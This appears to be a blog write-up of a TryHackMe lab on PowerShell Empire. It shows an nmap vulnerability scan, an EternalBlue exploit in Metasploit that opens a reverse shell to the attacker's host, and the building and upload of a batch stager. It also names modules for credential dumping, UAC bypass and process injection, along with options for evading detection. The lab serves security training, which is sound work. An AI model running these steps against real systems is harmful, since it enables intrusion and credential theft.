Red Primer: PS Empire Writeup

Welcome!  This writeup goes over how to use PS Empire to set up a listener and get the stager for the listener onto the target Windows server.

Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

https://www.powershellempire.com/

 

Task 1

1) Deploy this machine and learn what exploitation this box is susceptible to!

Let’s scan the machine with nmap, specifying we want to scan for vulnerabilities.  The vuln script shows the Windows server is susceptible to MS17-010.

$ nmap  [machine_ip] -A -T4 --script vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-12 20:51 PDT
Pre-scan script results:
|_broadcast-avahi-dos: ERROR: Script execution failed (use -d to debug)
Nmap scan report for [machine_ip] 
Host is up (0.41s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp   open  microsoft-ds       Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3389/tcp  open  ssl/ms-wbt-server?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rdp-vuln-ms12-020: 
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|           
|     Disclosure date: 2012-03-13
|     References:
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|   
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|           
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_      http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_sslv2-drown: 
49152/tcp open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49153/tcp open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49158/tcp open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49160/tcp open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.55 seconds 

2) Exploit the vulnerability to spawn a reverse shell!

We can start metasploit-framework and search for any exploits relative to MS17-010. Once the correct exploit is found, and the options are set (RHOSTS, LHOSTS, etc.), the exploit can be run.

$ msfconsole
msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


msf5 > use 2
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts  [machine_ip]
rhosts => [machine_ip]
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on [host_ip]:4444 
[*] [machine_ip]:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] [machine_ip]:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] [machine_ip]:445       - Scanned 1 of 1 hosts (100% complete)
[*] [machine_ip]:445 - Connecting to target for exploitation.
[+] [machine_ip]:445 - Connection established for exploitation.
[+] [machine_ip]:445 - Target OS selected valid for OS indicated by SMB reply
[*] [machine_ip]:445 - CORE raw buffer dump (42 bytes)
[*] [machine_ip]:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] [machine_ip]:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] [machine_ip]:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] [machine_ip]:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] [machine_ip]:445 - Trying exploit with 12 Groom Allocations.
[*] [machine_ip]:445 - Sending all but last fragment of exploit packet
[*] [machine_ip]:445 - Starting non-paged pool grooming
[+] [machine_ip]:445 - Sending SMBv2 buffers
[+] [machine_ip]:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] [machine_ip]:445 - Sending final SMBv2 buffers.
[*] [machine_ip]:445 - Sending last fragment of exploit packet!
[*] [machine_ip]:445 - Receiving response from exploit packet
[+] [machine_ip]:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] [machine_ip]:445 - Sending egg to corrupted connection.
[*] [machine_ip]:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened ([host_ip]:4444 -> [machine_ip]:49187) at 2020-05-13 10:23:31 -0700
[+] [machine_ip]:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] [machine_ip]:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] [machine_ip]:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> 

We now have a reverse shell into the Windows Server. 

Task 2

This task involves installing Powershell Empire onto the host Linux machine.

Just follow directions in the post, which is same instructions on Empire’s own website.

I had no issues installing, but some users report not able to get the database running, and Empire needs the database in order to start.  I did have some errors while installing; what I did was run the /setup/reset.sh script and my install works with no issues. 

Task 3

1) Once empire has launched, type help to view the various menus. Which menu to we launch to access listeners?

Answer: listeners

2) Launch the listeners menu. In a manner similar to cobalt strike/metasploit, this will launch a contextual submenu. For the sake of this tutorial, we will be using an http listener in order to catch our connections. Type the command ‘uselistener http’ now. You can double-tap tab to view all options for listeners following typing ‘uselistener’

Answer: No answer needed.

3) What command can we now type to view all of the options related to our selected listener type?

Answer: info

4) Once the information regarding the listener pops up, peruse this for some of the more interesting options we can set in order to disguise our actions more. Which option can we use to set specific times when our listener will be active?

Answer: WorkingHours

5) Similar to changing/spoofing what browser you are using on the internet, what option can we set to appear as a different user agent (i.e. chrome, firefox, etc)?

Answer: DefaultProfile

6) What option can we use to set the port which the listener will bind to?

Answer: Port

7) In addition to changing our browser profile, we can change what our server appears as. What option can we set to change this?

**Empire has changed their menu options since the creation of the room, and I have verified with Tryhackme mods that the room needs to be updated.  
**The relevant option in this menu that does what the question asks (but doesn’t accept as correct answer) is Headers. A user on the THM Discord server messaged me and revealed the accepted answer. 

Answer: It accepts ServerVersion as correct answer.

8) Launch our newly created listener on port 80 with the command ‘execute’. What message is displayed following successfully launching the listener?

Answer: Listener successfully started!

9) We can verify that our listener is now active by typing what command?

Answer: listeners

Task 4

1) First, type the command ‘usestager’ and double-tap tab to view all options we have for stagers. Which option allows us to use a batch file?

(Empire: listeners) > usestager 
    multi/bash                osx/jar                   windows/bunny             windows/launcher_xml
    multi/launcher            osx/launcher              windows/csharp_exe        windows/macro
    multi/macro               osx/macho                 windows/dll               windows/macroless_msword
    multi/pyinstaller         osx/macro                 windows/ducky             windows/shellcode
    multi/war                 osx/pkg                   windows/hta               windows/teensy
    osx/applescript           osx/safari_launcher       windows/launcher_bat      windows/wmic
    osx/application           osx/shellcode             windows/launcher_lnk      
    osx/ducky                 osx/teensy                windows/launcher_sct      
    osx/dylib                 windows/backdoorLnkMacro  windows/launcher_vbs 

Answer: windows/launcher_bat

2) Let’s finish our previous command and select the batch file option. Press enter to finalize this. What is our new path to the ‘module’ we have selected?

Answer: stager/windows/launcher_bat

3) Since we’ve previously set our listener to use http, we must now set the associated options within our stager we are building to match that. What option must we set in order to accomplish this?

(Empire: stager/windows/launcher_bat) > info
    Name: BAT Launcher

    Description:
    Generates a self-deleting .bat launcher for
    Empire.

    Options:

    Name             Required    Value             Description
    ----             --------    -------           -----------
    Listener         True                          Listener to generate stager for.
    Language         True        powershell        Language of the stager to generate.
    StagerRetries    False       0                 Times for the stager to retry
                                                    connecting.
    OutFile          False       /tmp/launcher.bat File to output .bat launcher to,
                                                    otherwise displayed on the screen.
    Delete           False       True              Switch. Delete .bat after running.
    Obfuscate        False       False             Switch. Obfuscate the launcher
                                                    powershell code, uses the
                                                    ObfuscateCommand for obfuscation types.
                                                    For powershell only.
    ObfuscateCommand False       Token\All\1       The Invoke-Obfuscation command to use.
                                                    Only used if Obfuscate switch is True.
                                                    For powershell only.
    UserAgent        False       default           User-agent string to use for the staging
                                                    request (default, none, or other).
    Proxy            False       default           Proxy to use for request (default, none,
                                                    or other).
    ProxyCreds       False       default           Proxy credentials
                                                    ([domain\]username:password) to use for
                                                    request (default, none, or other). 

Answer: Listener

4) Type execute to finish creating our stager. Where is the stager saved?

 

(Empire: stager/windows/launcher_bat) > set Listener http1
(Empire: stager/windows/launcher_bat) > execute
    [*] Stager output written out to: /tmp/launcher.bat 

Answer: /tmp/launcher.bat

5) Using any shell you have previously gained into our victim system transport the stager batch file to the system and execute it. This can be done in numerous ways depending on the stager used, be prepared to be flexible with your transportation methods similarly to how you might handle an msfvenom package.

Here, I tried a couple different methods.  First I tried to run a python http server on the directory where the launcher.bat file is located, then use several different windows commands to download the file.  None of these worked, the command/service would just freeze, or not actually save the file after it was downloaded. 

The method that worked for me was to upgrade the reverse shell into a meterpreter shell, and use the upload command. 

Go back to the msfconsole window and background the reverse shell we have with Crtl + Z.  Then search for the post exploit “multi/manage/shell_to_meterpreter”.  Set the SESSION option to the backgrounded reverse shell, and run the exploit.  This should create a new session with a meterpreter shell. 

More detailed instructions for upgrading to meterpreter shell is available here: https://null-byte.wonderhowto.com/how-to/upgrade-normal-command-shell-metasploit-meterpreter-0166013/

Once we have a meterpreter shell, we can use the upload command to transfer the launcher.bat file onto the Windows Server.

Note that the upload command has the syntax:

upload <source> <dest>

In this example, I first navigated to the top of the C:\ drive in meterpreter.  So when I use the upload command, it will place ‘launcher.bat’ into C:\.

 

meterpreter > upload /tmp/launcher.bat launcher.bat
    [*] uploading  : /tmp/launcher.bat -> launcher.bat
    [*] Uploaded 5.00 KiB of 5.00 KiB (100.0%): /tmp/launcher.bat -> launcher.bat
    [*] uploaded   : /tmp/launcher.bat -> launcher.bat 

Now we can go back to the regular shell and run launcher.bat.

 

Task 5

1) First, type agents to view our registered agents.

Answer: No answer needed.

2) Once you’ve typed agents to list the registered agents, the agents submenu will become active. Use the help menu to answer the following questions.

Answer: No answer needed.

 

(Empire: agents) > help
    Commands
    ========
    agents            Jump to the agents menu.
    autorun           Read and execute a list of Empire commands from a file and execute on each new agent "autorun <resource file> <agent language>" e.g. "autorun /root/ps.rc powershell". Or clear any autorun setting with "autorun clear" and show current autorun settings with "autorun show"
    back              Go back to the main menu.
    clear             Clear one or more agent's taskings.
    creds             Display/return credentials from the database.
    exit              Exit Empire.
    help              Displays the help menu.
    interact          Interact with a particular agent.
    kill              Task one or more agents to exit.
    killdate          Set the killdate for one or more agents (killdate [agent/all] 01/01/2016).
    list              Lists all active agents (or listeners).
    listeners         Jump to the listeners menu.
    lostlimit         Task one or more agents to 'lostlimit [agent/all] [number of missed callbacks] '
    main              Go back to the main menu.
    remove            Remove one or more agents from the database.
    rename            Rename a particular agent.
    resource          Read and execute a list of Empire commands from a file.
    searchmodule      Search Empire module names/descriptions.
    sleep             Task one or more agents to 'sleep [agent/all] interval [jitter]'
    uselistener       Use an Empire listener module.
    usemodule         Use an Empire PowerShell module.
    usestager         Use an Empire stager.
    workinghours      Set the workinghours for one or more agents (workinghours [agent/all] 9:00-17:00). 

3) What command do we use to interact with an agent?

Answer: interact

4) What about if we wanted to list any usernames and passwords we have gathered?

Answer: creds

5) And if we wanted to ‘deactivate’ an agent for a while to avoid detection?

Answer: sleep

6) How about if we wanted to delete an agent or disconnect it?

Answer: kill

7) Moving into the post exploitation modules, what command can we use to search through these?

Answer: searchmodule

8) We’ll start with the most important module, find the module which plays a specific AC/DC song.

 

(Empire: agents) > searchmodule thunderstruck

    powershell/trollsploit/thunderstruck

            Play's a hidden version of AC/DC's Thunderstruck video while maxing
            out a computer's volume.


    python/trollsploit/osx/thunderstruck
    
        Open Safari in the background and play Thunderstruck. 

Answer: python/trollsploit/osx/thunderstruck

9) What if we wanted to perform an lsa dump with a certain popular windows credential gathering tool?

Answer: powershell/credentials/mimikatz/lsadump

10) Sometime we might not have the permissions level that we require to perform further actions, what module set might we have to use to get around UAC?

Answer: bypassuac

11) What module family allows us to gather additional information about the network we are on?

Answer: recon

12) Our process we have compromised might not be the most stable, how do we migrate to another process? (This will have a specific module answer)

Answer: powershell/management/psinject

13) Last but not least, what module can we use to turn on remote desktop access for our purposes?

Answer: powershell/management/enable_rdp

We’re done!  We can really mess up a Windows System with this framework.  I really enjoy the trollsploits – playing AC/DC, and there’s one that plays Rick Astley’s Never Gonna Give You Up!

Leave a Reply